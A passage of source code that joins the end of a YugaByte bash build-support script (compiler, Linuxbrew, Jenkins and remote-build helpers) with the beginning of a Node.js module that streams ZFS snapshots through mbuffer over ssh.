cxx_executable=$YB_LINUXBREW_DIR/bin/g++
else
cc_executable=gcc
cxx_executable=g++
fi
;;
clang)
if [[ -n ${YB_CLANG_PREFIX:-} ]]; then
if [[ ! -d $YB_CLANG_PREFIX/bin ]]; then
fatal "Directory YB_CLANG_PREFIX/bin ($YB_CLANG_PREFIX/bin) does not exist"
fi
cc_executable=$YB_CLANG_PREFIX/bin/clang
elif [[ $OSTYPE =~ ^darwin ]]; then
cc_executable=/usr/bin/clang
else
local clang_path
local clang_found=false
local clang_paths_to_try=(
"$YB_THIRDPARTY_DIR/clang-toolchain/bin/clang"
# clang is present in this location in pre-built third-party archives built before
# the transition to Linuxbrew (https://phabricator.dev.yugabyte.com/D982). This can be
# removed when the transition is complete.
"$YB_THIRDPARTY_DIR/installed/common/bin/clang"
)
for clang_path in "${clang_paths_to_try[@]}"; do
if [[ -f $clang_path ]]; then
cc_executable=$clang_path
clang_found=true
break
fi
done
if ! "$clang_found"; then
fatal "Failed to find clang at the following locations: ${clang_paths_to_try[@]}"
fi
fi
if [[ -z ${cxx_executable:-} ]]; then
cxx_executable=$cc_executable++ # clang -> clang++
fi
;;
zapcc)
if [[ -n ${YB_ZAPCC_INSTALL_PATH:-} ]]; then
cc_executable=$YB_ZAPCC_INSTALL_PATH/bin/zapcc
cxx_executable=$YB_ZAPCC_INSTALL_PATH/bin/zapcc++
else
cc_executable=zapcc
cxx_executable=zapcc++
fi
;;
*)
fatal "Unknown compiler type '$compiler_type'"
esac
local compiler_var_name
for compiler_var_name in cc_executable cxx_executable; do
if [[ -n ${!compiler_var_name:-} ]]; then
local compiler_path=${!compiler_var_name}
if [[ ! -x $compiler_path && $compiler_path =~ ^[a-z+]+$ ]]; then
# This is a plain "gcc/g++/clang/clang++" compiler command name. Try to find the exact
# compiler path using the "which" command.
set +e
compiler_path=$( remove_ccache_dir_from_path && which "${!compiler_var_name}" )
if [[ $? -ne 0 ]]; then
# "which" did not work, revert to the old value.
compiler_path=${!compiler_var_name}
fi
set -e
fi
if [[ ! -x $compiler_path ]]; then
fatal "Compiler executable does not exist at the path we set $compiler_var_name to" \
"(possibly applying 'which' expansion): $compiler_path" \
"(trying to use compiler type '$compiler_type')."
fi
eval $compiler_var_name=\"$compiler_path\"
fi
done
}
# Make pushd and popd quiet.
# http://stackoverflow.com/questions/25288194/dont-display-pushd-popd-stack-accross-several-bash-scripts-quiet-pushd-popd
pushd() {
local dir_name=$1
if [[ ! -d $dir_name ]]; then
fatal "Directory '$dir_name' does not exist"
fi
command pushd "$@" > /dev/null
}
popd() {
command popd "$@" > /dev/null
}
detect_linuxbrew() {
YB_USING_LINUXBREW=false
local user_specified_linuxbrew_dir=${YB_LINUXBREW_DIR:-}
unset YB_LINUXBREW_DIR
unset YB_LINUXBREW_LIB_DIR
if ! is_linux; then
return
fi
local candidates=(
"$HOME/.linuxbrew-yb-build"
)
local version_for_jenkins_file=$YB_SRC_ROOT/thirdparty/linuxbrew_version_for_jenkins.txt
if [[ -f $version_for_jenkins_file ]]; then
local version_for_jenkins=$( read_file_and_trim "$version_for_jenkins_file" )
preferred_linuxbrew_dir="$SHARED_LINUXBREW_BUILDS_DIR/linuxbrew_$version_for_jenkins"
if [[ -d $preferred_linuxbrew_dir ]]; then
if is_jenkins_user; then
# If we're running on Jenkins (or building something for consumption by Jenkins under the
# "jenkins" user), then the "Linuxbrew for Jenkins" directory takes precedence.
candidates=( "$preferred_linuxbrew_dir" "${candidates[@]}" )
else
# Otherwise, the user's local Linuxbrew build takes precedence.
candidates=( "${candidates[@]}" "$preferred_linuxbrew_dir" )
fi
elif is_jenkins; then
log "Warning: Linuxbrew directory referenced by '$version_for_jenkins_file' does not" \
"exist: '$preferred_linuxbrew_dir', will attempt to use other location."
fi
elif is_jenkins; then
log "Warning: '$version_for_jenkins_file' does not exist"
fi
if [[ -n $user_specified_linuxbrew_dir ]]; then
candidates=( "$user_specified_linuxbrew_dir" "${candidates[@]}" )
fi
local linuxbrew_dir
for linuxbrew_dir in "${candidates[@]}"; do
if [[ -d "$linuxbrew_dir" &&
-d "$linuxbrew_dir/bin" &&
-d "$linuxbrew_dir/lib" &&
-d "$linuxbrew_dir/include" ]]; then
export YB_LINUXBREW_DIR=$linuxbrew_dir
YB_USING_LINUXBREW=true
YB_LINUXBREW_LIB_DIR=$YB_LINUXBREW_DIR/lib
break
fi
done
}
using_linuxbrew() {
if [[ $YB_USING_LINUXBREW == true ]]; then
return 0
else
return 1
fi
}
using_ninja() {
if [[ ${YB_USE_NINJA:-} == "1" ]]; then
return 0
else
return 1
fi
}
set_build_env_vars() {
if using_linuxbrew; then
# We need to add Linuxbrew's bin directory to PATH so that we can find the right compiler and
# linker.
export PATH=$YB_LINUXBREW_DIR/bin:$PATH
fi
}
detect_num_cpus() {
if [[ ! ${YB_NUM_CPUS:-} =~ ^[0-9]+$ ]]; then
if is_linux; then
YB_NUM_CPUS=$(grep -c processor /proc/cpuinfo)
elif is_mac; then
YB_NUM_CPUS=$(sysctl -n hw.ncpu)
else
fatal "Don't know how to detect the number of CPUs on OS $OSTYPE."
fi
if [[ ! $YB_NUM_CPUS =~ ^[0-9]+$ ]]; then
fatal "Invalid number of CPUs detected: '$YB_NUM_CPUS' (expected a number)."
fi
fi
}
detect_num_cpus_and_set_make_parallelism() {
detect_num_cpus
if [[ -z ${YB_MAKE_PARALLELISM:-} ]]; then
if [[ ${YB_REMOTE_BUILD:-} == "1" ]]; then
declare -i num_build_workers=$( wc -l "$YB_BUILD_WORKERS_FILE" | awk '{print $1}' )
# Add one to the number of workers so that we cause the auto-scaling group to scale up a bit
# by stressing the CPU on each worker a bit more.
declare -i effective_num_build_workers=$(( $num_build_workers + 1 ))
# However, make sure this number is within a reasonable range.
if [[ $effective_num_build_workers -lt $MIN_EFFECTIVE_NUM_BUILD_WORKERS ]]; then
effective_num_build_workers=$MIN_EFFECTIVE_NUM_BUILD_WORKERS
fi
if [[ $effective_num_build_workers -gt $MAX_EFFECTIVE_NUM_BUILD_WORKERS ]]; then
effective_num_build_workers=$MAX_EFFECTIVE_NUM_BUILD_WORKERS
fi
YB_MAKE_PARALLELISM=$(( $effective_num_build_workers * $YB_NUM_CORES_PER_BUILD_WORKER ))
else
YB_MAKE_PARALLELISM=$YB_NUM_CPUS
fi
fi
export YB_MAKE_PARALLELISM
}
run_sha256sum_on_mac() {
shasum --portable --algorithm 256 "$@"
}
verify_sha256sum() {
local common_args="--check"
if [[ $OSTYPE =~ darwin ]]; then
run_sha256sum_on_mac $common_args "$@"
else
sha256sum --quiet $common_args "$@"
fi
}
compute_sha256sum() {
(
if [[ $OSTYPE =~ darwin ]]; then
run_sha256sum_on_mac "$@"
else
sha256sum "$@"
fi
) | awk '{print $1}'
}
validate_thirdparty_dir() {
ensure_directory_exists "$YB_THIRDPARTY_DIR/build_definitions"
ensure_directory_exists "$YB_THIRDPARTY_DIR/patches"
ensure_file_exists "$YB_THIRDPARTY_DIR/build_thirdparty.py"
}
# Detect if we're running on Google Compute Platform. We perform this check lazily as there might be
# a bit of a delay resolving the domain name.
detect_gcp() {
# How to detect if we're running on Google Compute Engine:
# https://cloud.google.com/compute/docs/instances/managing-instances#dmi
if [[ -n ${YB_PRETEND_WE_ARE_ON_GCP:-} ]] || \
curl metadata.google.internal --silent --output /dev/null --connect-timeout 1; then
readonly is_running_on_gcp_exit_code=0 # "true" exit code
else
readonly is_running_on_gcp_exit_code=1 # "false" exit code
fi
}
is_running_on_gcp() {
if [[ -z ${is_running_on_gcp_exit_code:-} ]]; then
detect_gcp
fi
return "$is_running_on_gcp_exit_code"
}
is_jenkins_user() {
[[ $USER == "jenkins" ]]
}
is_jenkins() {
if [[ -n ${BUILD_ID:-} && -n ${JOB_NAME:-} ]] && is_jenkins_user; then
return 0 # Yes, we're running on Jenkins.
fi
return 1 # Probably running locally.
}
# Check if we're in a Jenkins master build.
is_jenkins_master_build() {
if [[ -n ${JOB_NAME:-} && $JOB_NAME = *-master-* ]]; then
return 0
fi
return 1
}
# Check if we're in a Jenkins Phabricator build (a pre-commit build).
is_jenkins_phabricator_build() {
if [[ -z ${JOB_NAME:-} ]]; then
return 1 # No, not running on Jenkins.
fi
if [[ $JOB_NAME == *-phabricator-* || $JOB_NAME == *-phabricator ]]; then
return 0 # Yes, this is a Phabricator build.
fi
return 1 # No, some other kind of Jenkins job.
}
# Check if we're using an NFS partition in YugaByte's build environment.
is_src_root_on_nfs() {
if [[ $YB_SRC_ROOT =~ ^/(n|z|u)/ ]]; then
return 0
fi
return 1
}
is_remote_build() {
if [[ ${YB_REMOTE_BUILD:-} == "1" ]]; then
return 0 # "true" return value
fi
return 1 # "false" return value
}
# This is used for escaping command lines for remote execution.
# From StackOverflow: https://goo.gl/sTKReB
# Using this approach: "Put the whole string in single quotes. This works for all chars except
# single quote itself. To escape the single quote, close the quoting before it, insert the single
# quote, and re-open the quoting."
#
escape_cmd_line() {
escape_cmd_line_rv=""
for arg in "$@"; do
escape_cmd_line_rv+=" '"${arg/\'/\'\\\'\'}"'"
# This should be equivalent to the sed command below. The quadruple backslash encodes one
# backslash in the replacement string. We don't need that in the pure-bash implementation above.
# sed -e "s/'/'\\\\''/g; 1s/^/'/; \$s/\$/'/"
done
# Remove the leading space if necessary.
escape_cmd_line_rv=${escape_cmd_line_rv# }
}
run_remote_cmd() {
local build_host=$1
local executable=$2
shift 2
local escape_cmd_line_rv
escape_cmd_line "$@"
ssh "$build_host" \
"'$YB_BUILD_SUPPORT_DIR/remote_cmd.sh' '$PWD' '$PATH' '$executable' $escape_cmd_line_rv"
}
# Run the build command (cmake / make) on the appropriate host. This is localhost in most cases.
# However, in a remote build, we ensure we run this command on the "distributed build master host"
# machine, as there are some issues with running cmake or make over NFS (e.g. stale file handles).
run_build_cmd() {
if is_remote_build && [[ $HOSTNAME != $DISTRIBUTED_BUILD_MASTER_HOST ]]; then
run_remote_cmd "$DISTRIBUTED_BUILD_MASTER_HOST" "$@"
else
"$@"
fi
}
configure_remote_build() {
# Automatically set YB_REMOTE_BUILD in an NFS GCP environment.
if [[ -z ${YB_NO_REMOTE_BUILD:-} ]] && is_running_on_gcp && is_src_root_on_nfs; then
if [[ -z ${YB_REMOTE_BUILD:-} ]]; then
log "Automatically enabling distributed build (running in an NFS GCP environment). " \
"Use YB_NO_REMOTE_BUILD (or the --no-remote ybd option) to disable this behavior."
export YB_REMOTE_BUILD=1
else
log "YB_REMOTE_BUILD already defined: '$YB_REMOTE_BUILD', not enabling it automatically," \
"even though we would in this case."
fi
elif is_jenkins; then
# Make it easier to diagnose why we're not using the distributed build. Only enable this on
# Jenkins to avoid confusing output during development.
log "Not using remote / distributed build:" \
"YB_NO_REMOTE_BUILD=${YB_NO_REMOTE_BUILD:-undefined}. See additional diagnostics below."
is_running_on_gcp && log "Running on GCP." || log "This is not GCP."
if is_src_root_on_nfs; then
log "YB_SRC_ROOT ($YB_SRC_ROOT) appears to be on NFS in YugaByte's distributed build setup."
fi
fi
}
yb_edition_detected=false
validate_edition() {
if [[ ! $YB_EDITION =~ ^(community|enterprise)$ ]]; then
fatal "The YB_EDITION environment variable has an invalid value: '$YB_EDITION'" \
"(must be either 'community' or 'enterprise')."
fi
}
detect_edition() {
if "$yb_edition_detected"; then
return
fi
yb_edition_detected=true
# If we haven't detected edition based on BUILD_ROOT, let's do that based on existence of the
# enterprise source directory.
if [[ -z ${YB_EDITION:-} ]]; then
if is_jenkins && [[ $JOB_NAME =~ -community(-|$) ]]; then
YB_EDITION=community
log "Detecting YB_EDITION: $YB_EDITION based on Jenkins job name: $JOB_NAME"
elif is_jenkins && [[ $JOB_NAME =~ -enterprise(-|$) ]]; then
YB_EDITION=enterprise
log "Detecting YB_EDITION: $YB_EDITION based on Jenkins job name: $JOB_NAME"
elif [[ -d $YB_ENTERPRISE_ROOT ]]; then
YB_EDITION=enterprise
log "Detected YB_EDITION: $YB_EDITION based on existence of '$YB_ENTERPRISE_ROOT'"
else
YB_EDITION=community
log "Detected YB_EDITION: $YB_EDITION"
fi
fi
if [[ $YB_EDITION == "enterprise" && ! -d $YB_ENTERPRISE_ROOT ]]; then
fatal "YB_EDITION is set to '$YB_EDITION' but the directory '$YB_ENTERPRISE_ROOT'" \
"does not exist"
fi
readonly YB_EDITION
export YB_EDITION
}
set_yb_src_root() {
export YB_SRC_ROOT=$1
YB_BUILD_SUPPORT_DIR=$YB_SRC_ROOT/build-support
if [[ ! -d $YB_SRC_ROOT ]]; then
fatal "YB_SRC_ROOT directory '$YB_SRC_ROOT' does not exist"
fi
YB_ENTERPRISE_ROOT=$YB_SRC_ROOT/ent
YB_COMPILER_WRAPPER_CC=$YB_BUILD_SUPPORT_DIR/compiler-wrappers/cc
YB_COMPILER_WRAPPER_CXX=$YB_BUILD_SUPPORT_DIR/compiler-wrappers/c++
}
read_file_and_trim() {
expect_num_args 1 "$@"
local file_name=$1
if [[ -f $file_name ]]; then
cat "$file_name" | sed -e 's/^[[:space:]]*//; s/[[:space:]]*$//'
else
log "File '$file_name' does not exist"
return 1
fi
}
# In our internal environment we build third-party dependencies in separate directories on NFS
# so that we can use them across many builds.
find_thirdparty_dir() {
found_shared_thirdparty_dir=false
local parent_dir_for_shared_thirdparty=$NFS_PARENT_DIR_FOR_SHARED_THIRDPARTY
if [[ ! -d $parent_dir_for_shared_thirdparty ]]; then
log "Parent directory for shared third-party directories" \
"('$NFS_PARENT_DIR_FOR_SHARED_THIRDPARTY') does not exist, cannot use pre-built" \
"third-party directory from there."
return
fi
local version=$(
read_file_and_trim "$YB_SRC_ROOT/thirdparty/version_for_jenkins_${short_os_name}.txt"
)
local thirdparty_dir_suffix="yugabyte-thirdparty-${version}/thirdparty"
local existing_thirdparty_dir="${parent_dir_for_shared_thirdparty}/${thirdparty_dir_suffix}"
if [[ -d $existing_thirdparty_dir ]]; then
log "Using existing third-party dependencies from $existing_thirdparty_dir"
if is_jenkins; then
log "Cleaning the old dedicated third-party dependency build in '$YB_SRC_ROOT/thirdparty'"
unset YB_THIRDPARTY_DIR
"$YB_SRC_ROOT/thirdparty/clean_thirdparty.sh" --all
fi
export YB_THIRDPARTY_DIR=$existing_thirdparty_dir
found_shared_thirdparty_dir=true
export NO_REBUILD_THIRDPARTY=1
return
fi
log "Even though the top-level directory '$parent_dir_for_shared_thirdparty'" \
"exists, we could not find a prebuilt shared third-party directory there that exists. " \
"Falling back to building our own third-party dependencies."
}
handle_predefined_build_root_quietly=false
handle_predefined_build_root() {
expect_num_args 0 "$@"
if [[ -z ${predefined_build_root:-} ]]; then
return
fi
if [[ -d $predefined_build_root ]]; then
predefined_build_root=$( cd "$predefined_build_root" && pwd )
fi
if [[ $predefined_build_root != $YB_BUILD_INTERNAL_PARENT_DIR/* && \
$predefined_build_root != $YB_BUILD_EXTERNAL_PARENT_DIR/* ]]; then
# Sometimes $predefined_build_root contains symlinks on its path.
$YB_SRC_ROOT/build-support/validate_build_root.py \
"$predefined_build_root" \
"$YB_BUILD_INTERNAL_PARENT_DIR" \
"$YB_BUILD_EXTERNAL_PARENT_DIR"
fi
local basename=${predefined_build_root##*/}
if [[ $basename =~ $BUILD_ROOT_BASENAME_RE ]]; then
local _build_type=${BASH_REMATCH[1]}
local _compiler_type=${BASH_REMATCH[2]}
local _linking_type=${BASH_REMATCH[3]}
local _edition=${BASH_REMATCH[4]}
local _dash_ninja=${BASH_REMATCH[5]}
else
fatal "Could not parse build root directory name '$basename'" \
"(full path: '$predefined_build_root'). Expected to match '$BUILD_ROOT_BASENAME_RE'."
fi
if [[ -z ${build_type:-} ]]; then
if ! "$handle_predefined_build_root_quietly"; then
log "Setting build type to '$build_type' based on predefined build root ('$basename')"
fi
build_type=$_build_type
validate_build_type "$build_type"
elif [[ $build_type != $_build_type ]]; then
fatal "Build type from the build root ('$_build_type' from '$predefined_build_root') does " \
"not match current build type ('$build_type')."
fi
if [[ -z ${YB_COMPILER_TYPE:-} ]]; then
export YB_COMPILER_TYPE=$_compiler_type
if ! "$handle_predefined_build_root_quietly"; then
log "Automatically setting compiler type to '$YB_COMPILER_TYPE' based on predefined build" \
"root ('$basename')"
fi
elif [[ $YB_COMPILER_TYPE != $_compiler_type ]]; then
fatal "Compiler type from the build root ('$_compiler_type' from '$predefined_build_root') " \
"does not match YB_COMPILER_TYPE ('$YB_COMPILER_TYPE')."
fi
export YB_USE_NINJA=${YB_USE_NINJA:-}
if [[ $_dash_ninja == "-ninja" && -z ${YB_USE_NINJA:-} ]]; then
if ! "$handle_predefined_build_root_quietly"; then
log "Setting YB_USE_NINJA to 1 based on predefined build root ('$basename')"
fi
export YB_USE_NINJA=1
elif [[ $_dash_ninja == "-ninja" && $YB_USE_NINJA != "1" || \
$_dash_ninja != "-ninja" && $YB_USE_NINJA == "1" ]]; then
fatal "The use of ninja from build root ('$predefined_build_root') does not match that" \
"of the YB_USE_NINJA env var ('$YB_USE_NINJA')"
fi
if [[ -z ${YB_EDITION:-} ]]; then
export YB_EDITION=$_edition
if ! "$handle_predefined_build_root_quietly"; then
log "Detected YB_EDITION: '$YB_EDITION' based on predefined build root ('$basename')"
fi
elif [[ $YB_EDITION != $_edition ]]; then
fatal "Edition from the build root ('$_edition' from '$predefined_build_root') " \
"does not match YB_EDITION ('$YB_EDITION')."
fi
}
# Remove the build/latest symlink to prevent Jenkins from showing every test twice in test results.
# We call this from a few different places just in case.
remove_latest_symlink() {
local latest_build_link=$YB_BUILD_PARENT_DIR/latest
if [[ -h $latest_build_link ]]; then
log "Removing the latest symlink at '$latest_build_link'"
( set -x; unlink "$latest_build_link" )
fi
}
detect_os() {
short_os_name="unknown_os"
if is_mac; then
short_os_name="mac"
elif is_linux; then
short_os_name="linux"
fi
}
# Assigns a random "test invocation id" that allows to kill stuck processes corresponding to this
# instance of a particular test or the whole test suite.
set_test_invocation_id() {
local timestamp=$( get_timestamp_for_filenames )
export YB_TEST_INVOCATION_ID=test_invocation_${timestamp}_${RANDOM}_${RANDOM}_$$
}
# Kills any processes that have YB_TEST_INVOCATION_ID in their command line. Sets
# killed_stuck_processes=true in case that happens.
kill_stuck_processes() {
expect_num_args 0 "$@"
killed_stuck_processes=false
if [[ -z ${YB_TEST_INVOCATION_ID:-} ]]; then
return
fi
local pid
for pid in $( pgrep -f "$YB_TEST_INVOCATION_ID" ); do
log "Found pid $pid from this test suite (YB_TEST_INVOCATION_ID=$YB_TEST_INVOCATION_ID)," \
"killing it with SIGKILL."
ps -p "$pid" -f
if kill -9 "$pid"; then
killed_stuck_processes=true
log "Killed process $pid with SIGKILL."
fi
done
}
handle_build_root_from_current_dir() {
if [[ ${YB_IS_THIRDPARTY_BUILD:-} == "1" ]]; then
return
fi
local handle_predefined_build_root_quietly=true
local d=$PWD
while [[ $d != "/" && $d != "" ]]; do
basename=${d##*/}
if [[ $basename =~ $BUILD_ROOT_BASENAME_RE ]]; then
predefined_build_root=$d
handle_predefined_build_root
return
fi
d=${d%/*}
done
fatal "Working directory of the compiler '$PWD' is not within a valid YugaByte build root."
}
validate_numeric_arg_range() {
expect_num_args 4 "$@"
local arg_name=$1
local arg_value=$2
local -r -i min_value=$3
local -r -i max_value=$4
if [[ ! $arg_value =~ ^[0-9]+$ ]]; then
fatal "Invalid numeric argument value for --$arg_name: '$arg_value'"
fi
if [[ $arg_value -lt $min_value || $arg_value -gt $max_value ]]; then
fatal "Value out of range for --$arg_name: $arg_value, must be between $min_value and" \
"$max_value."
fi
}
# -------------------------------------------------------------------------------------------------
# Python support
# -------------------------------------------------------------------------------------------------
# Checks syntax of all Python scripts in the repository.
check_python_script_syntax() {
if [[ -n ${YB_VERBOSE:-} ]]; then
log "Checking syntax of Python scripts"
fi
pushd "$YB_SRC_ROOT"
local IFS=$'\n'
git ls-files '*.py' | xargs -P 8 -n 1 "$YB_BUILD_SUPPORT_DIR/check_python_syntax.py"
popd
}
add_python_wrappers_dir_to_path() {
# Make sure the Python wrappers directory is the first on PATH
remove_path_entry "$YB_PYTHON_WRAPPERS_DIR"
export PATH=$YB_PYTHON_WRAPPERS_DIR:$PATH
}
activate_virtualenv() {
local virtualenv_parent_dir=$YB_BUILD_PARENT_DIR
local virtualenv_dir=$virtualenv_parent_dir/$YB_VIRTUALENV_BASENAME
if [[ ! $virtualenv_dir = */$YB_VIRTUALENV_BASENAME ]]; then
fatal "Internal error: virtualenv_dir ('$virtualenv_dir') must end" \
"with YB_VIRTUALENV_BASENAME ('$YB_VIRTUALENV_BASENAME')"
fi
if [[ ${YB_RECREATE_VIRTUALENV:-} == "1" && -d $virtualenv_dir ]]; then
log "YB_RECREATE_VIRTUALENV is set, deleting virtualenv at '$virtualenv_dir'"
rm -rf "$virtualenv_dir"
unset YB_RECREATE_VIRTUALENV
fi
if [[ ! -d $virtualenv_dir ]]; then
if [[ -n ${VIRTUAL_ENV:-} && -f $VIRTUAL_ENV/bin/activate ]]; then
local old_virtual_env=$VIRTUAL_ENV
# Re-activate and deactivate the other virtualenv we're in. Otherwise the deactivate
# function might not even be present in our current shell. This is necessary because otherwise
# the --user installation below will fail.
set +eu
. "$VIRTUAL_ENV/bin/activate"
deactivate
set -eu
# Not clear why deactivate does not do this.
remove_path_entry "$old_virtual_env/bin"
fi
# We need to be using system python to install the virtualenv module or create a new virtualenv.
pip2 install virtualenv --user
(
set -x
mkdir -p "$virtualenv_parent_dir"
cd "$virtualenv_parent_dir"
python2 -m virtualenv "$YB_VIRTUALENV_BASENAME"
)
fi
set +u
. "$virtualenv_dir"/bin/activate
set -u
local pip_no_cache=""
if [[ -n ${YB_PIP_NO_CACHE:-} ]]; then
pip_no_cache="--no-cache-dir"
fi
pip2 install -r "$YB_SRC_ROOT/requirements.txt" $pip_no_cache
add_python_wrappers_dir_to_path
}
check_python_interpreter_version() {
expect_num_args 3 "$@"
local python_interpreter=$1
local expected_major_version=$2
local minor_version_lower_bound=$3
# Get the Python interpreter version. Filter out debug output we may be adding if
# YB_PYTHON_WRAPPER_DEBUG is set.
local version_str=$( "$python_interpreter" --version 2>&1 >/dev/null | grep -v "Invoking Python" )
version_str=${version_str#Python }
local actual_major_version=${version_str%%.*}
local version_str_without_major=${version_str#*.}
local actual_minor_version=${version_str_without_major%%.*}
if [[ $actual_major_version -ne $expected_major_version ]]; then
fatal "Expected major version for Python interpreter '$python_interpreter' to be" \
"'$expected_major_version', found '$actual_major_version'. Full Python version:" \
"'$version_str'."
fi
if [[ $actual_minor_version -lt $minor_version_lower_bound ]]; then
fatal "Expected minor version for Python interpreter '$python_interpreter' to be at least " \
"'$minor_version_lower_bound', found '$actual_minor_version'. Full Python version:" \
"'$version_str'."
fi
}
check_python_interpreter_versions() {
check_python_interpreter_version python2 2 7
if is_mac; then
local python_interpreter_basename
for python_interpreter_basename in python python2 python 2.7 python3; do
local homebrew_interpreter_path=/usr/local/bin/$python_interpreter_basename
if [[ -e $homebrew_interpreter_path ]]; then
if [[ ! -L $homebrew_interpreter_path ]]; then
fatal "$homebrew_interpreter_path exists but is not a symlink." \
"Broken Homebrew installation?"
fi
local link_target=$( readlink "$homebrew_interpreter_path" )
if [[ $link_target == /usr/bin/* ]]; then
fatal "Found symlink $homebrew_interpreter_path -> $link_target." \
"Broken Homebrew installation?"
fi
fi
done
fi
}
log_file_existence() {
expect_num_args 1 "$@"
local file_name=$1
if [[ -L $file_name && -f $file_name ]]; then
log "Symlink exists and points to a file: $file_name"
elif [[ -L $file_name && -d $file_name ]]; then
log "Symlink exists and points to a directory: $file_name"
elif [[ -L $file_name ]]; then
log "Symlink exists but it might be broken: $file_name"
elif [[ -f $file_name ]]; then
log "File exists: $file_name"
elif [[ -d $file_name ]]; then
log "Directory exists: $file_name"
elif [[ ! -e $file_name ]]; then
log "File does not exist: $file_name"
else
log "File exists but we could not determine its type: $file_name"
fi
}
# Returns current git SHA1 in the variable current_git_sha1.
get_current_git_sha1() {
current_git_sha1=$( git rev-parse HEAD )
if [[ ! $current_git_sha1 =~ ^[0-9a-f]{40}$ ]]; then
fatal "Could not get current git SHA1 in $PWD, got: $current_git_sha1"
fi
}
# -------------------------------------------------------------------------------------------------
# Initialization
# -------------------------------------------------------------------------------------------------
detect_os
# This script is expected to be in build-support, a subdirectory of the repository root directory.
set_yb_src_root "$( cd "$( dirname "$BASH_SOURCE" )"/.. && pwd )"
if [[ $YB_SRC_ROOT == */ ]]; then
fatal "YB_SRC_ROOT ends with '/' (not allowed): '$YB_SRC_ROOT'"
fi
# Parent directory for build directories of all build types.
YB_BUILD_INTERNAL_PARENT_DIR=$YB_SRC_ROOT/build
YB_BUILD_EXTERNAL_PARENT_DIR=${YB_SRC_ROOT}__build
if [[ ${YB_USE_EXTERNAL_BUILD_ROOT:-} == "1" ]]; then
YB_BUILD_PARENT_DIR=$YB_BUILD_EXTERNAL_PARENT_DIR
else
YB_BUILD_PARENT_DIR=$YB_BUILD_INTERNAL_PARENT_DIR
fi
if [[ ! -d $YB_BUILD_SUPPORT_DIR ]]; then
fatal "Could not determine YB source directory from '$BASH_SOURCE':" \
"$YB_BUILD_SUPPORT_DIR does not exist."
fi
using_default_thirdparty_dir=false
if [[ -z ${YB_THIRDPARTY_DIR:-} ]]; then
YB_THIRDPARTY_DIR=$YB_SRC_ROOT/thirdparty
using_default_thirdparty_dir=true
fi
readonly YB_DEFAULT_CMAKE_OPTS=(
"-DCMAKE_C_COMPILER=$YB_COMPILER_WRAPPER_CC"
"-DCMAKE_CXX_COMPILER=$YB_COMPILER_WRAPPER_CXX"
)
YB_PYTHON_WRAPPERS_DIR=$YB_BUILD_SUPPORT_DIR/python-wrappers
if ! "${yb_is_python_wrapper_script:-false}"; then
detect_linuxbrew
add_python_wrappers_dir_to_path
fi
# End of initialization.
# -------------------------------------------------------------------------------------------------
|
var uuid = require('uuid');
var windowSize = 128;
var exec = require('child_process').exec;
var spawn = require('child_process').spawn;
var config = require('../config');
function Mbuffer(options){
this.remoteEnd = null;
this.localEnd = null;
this.transfer = null;
this.aborting = false;
this.err = null;
this.localCloseCode = null;
this.remoteCloseCode = null;
this.callbackDone = false;
this.log = null;
}
Mbuffer.prototype.executablePath = function(localOrRemote){
if ( localOrRemote == 'local' ){
if ( config.mBufferLocalPath != null ){
return config.mBufferLocalPath;
}
}else{
if ( config.mBufferRemotePath != null ){
return config.mBufferRemotePath;
}
}
return 'mbuffer';
}
Mbuffer.prototype.bufferSize = function(localOrRemote){
if ( localOrRemote == 'local' ){
if ( config.mBufferLocalBufferSize != null ){
return config.mBufferLocalBufferSize;
}
}else{
if ( config.mBufferRemoteBufferSize != null ){
return config.mBufferRemoteBufferSize;
}
}
return '1G';
}
Mbuffer.prototype.mBufferReceiveCmd = function(portNumber){
var localOrRemote = null;
if ( this.transfer.localToRemote() ){
localOrRemote = 'remote';
}else{
localOrRemote = 'local';
}
return this.executablePath(localOrRemote) + " -v 4 -W 60 -s 128k -m " + this.bufferSize(localOrRemote) + " -I " + portNumber.toString();
}
Mbuffer.prototype.mBufferSendCmd = function(portNumber){
var localOrRemote = null;
if ( this.transfer.localToRemote() ){
localOrRemote = 'local';
}else{
localOrRemote = 'remote';
}
return this.executablePath(localOrRemote) + " -s 128k -m " + this.bufferSize(localOrRemote) + " -W 60 -O " + this.transfer.remoteEndpoint().hostname + ":" + portNumber.toString();
}
Mbuffer.prototype.initiateRemote = function(transfer, portNumber){
var cmd = null;
if ( transfer.localToRemote() ){
cmd = [
this.mBufferReceiveCmd(portNumber),
"|",
transfer.zfsReceiveCmd()
].join(' ');
}
var sshCmd = transfer.remoteEndpoint().sshCmd();
sshCmd.splice(0, 1);
sshCmd.push(cmd);
this.log.trace('Initiating remote end with ssh ' + sshCmd.join(' '));
var setupRemote = spawn('ssh', sshCmd);
return setupRemote;
}
Mbuffer.prototype.initiateLocal = function(transfer, portNumber){
var cmd = null;
var destinationHost = transfer.remoteEndpoint().hostname;
if ( transfer.localToRemote() ){
//will be getting called second and the remote side is already setup
//just need to run zfs send piped into mbuffer linked to the remote side
cmd = [
transfer.zfsSendCmd(),
"|",
this.mBufferSendCmd(portNumber)
].join(' ');
}
this.log.trace('Initiating local end with ' + cmd);
var setupLocal = spawn('/bin/sh', ['-c', cmd]);
return setupLocal;
}
Mbuffer.prototype.findMatchingPids = function(processList, portNumber){
var lines = processList.split('\n');
var local = this.transfer.remoteEndpoint().hostname + ':' + portNumber.toString();
var remote = '-I ' + portNumber.toString();
var pids = [];
for ( var i = 0; i < lines.length; i++ ){
var line = lines[i];
if (( line.indexOf(local) != -1 ) || ( line.indexOf(remote) != -1)){
var parts = line.split(' ');
var cleanParts = [];
for ( var j = 0; j < parts.length; j++ ){
if ( parts[j].length != 0 ){
cleanParts.push(parts[j]);
}
}
pids.push(cleanParts[1]);
}
}
return pids;
}
Mbuffer.prototype.cleanupMbuffer = function(portNumber, remote, callback){
var cb = callback;
var self = this;
var pn = portNumber;
var grep = 'ps auwwwx | grep mbuffer';
var ssh = self.transfer.remoteEndpoint().sshCmd().join(' ');
var cmd = null;
if ( remote === true ){
cmd = ssh + ' ' + grep;
}else{
cmd = grep;
}
var getPid = exec(cmd, function(error, stdout, stderr){
var pids = self.findMatchingPids(stdout, pn);
if ( pids.length == 0 ){
cb(null);
return;
}
var killCmd = null;
if ( remote === true ){
killCmd = ssh + ' kill ' + pids.join(' ');
}else{
killCmd = 'kill ' + pids.join(' ');
}
var killPid = exec(killCmd, function(error, stdout, stderr){
cb(null);
});
});
}
Mbuffer.prototype.callbackIfDone = function(callback){;
if ( this.callbackDone ){
return;
}
if (( this.localEnd == null ) && ( this.remoteEnd == null )){
//both ends are closed
if (( this.localCloseCode == 0 ) && ( this.remoteCloseCode == 0 )){
//everything went well
this.callbackDone = true;
callback(null);
}else{
